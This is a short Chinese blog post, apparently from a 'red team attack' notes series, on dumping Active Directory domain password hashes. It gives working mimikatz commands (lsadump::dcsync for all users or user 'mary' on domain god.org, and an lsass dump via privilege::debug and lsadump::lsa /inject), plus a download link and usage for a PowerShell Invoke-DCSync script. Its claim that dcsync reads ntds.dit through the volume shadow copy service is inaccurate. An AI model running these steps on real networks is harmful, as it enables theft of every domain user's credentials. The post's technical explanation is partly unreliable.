大家好,这里是 渗透攻击红队 的第 34 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更
dcsync 获取域内用户哈希值
mimikatz 转储哈希值
mimikatz 有一个 dcsync 功能,可以利用卷影拷贝服务直接读取 ntds.dit 文件并检索域散列值。
前提必须使用管理员权限运行 mimikatz 才可以读取 ntds.dit。
在域内任意一台主机,以域管理员权限执行命令:
lsadump::dcsync /domain:god.org /all /csv
使用 mimikatz 的 dcsync 功能也可以导出指定用户的散列值,导出用户 mary 的散列值:
lsadump::dcsync /domain:god.org /user:mary
通过转储 lsass.exe 进程对散列值进行 Dump 操作:(导出域内所有账号和域散列值)
privilege::debug
log
lsadump::lsa /inject
如果 mimikatz 没有预先执行 privilege::debug 命令,将导致权限不足、读取失败。如果用户数量太多,mimikatz 无法完全显示出来,可以先执行 log(会在mimikatz目录下生成一个文本文件,用于记录mimikatz的所有执行结果)
powershell dcsync 获取域内用户哈希值
Invoke-DCSync.ps1 可以利用 dcsync 直接读取 ntds.dit,以获取域账号和域散列值。
下载地址:https://gist.github.com/monoxgas/9d238accd969550136db
Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -PWDumpFormat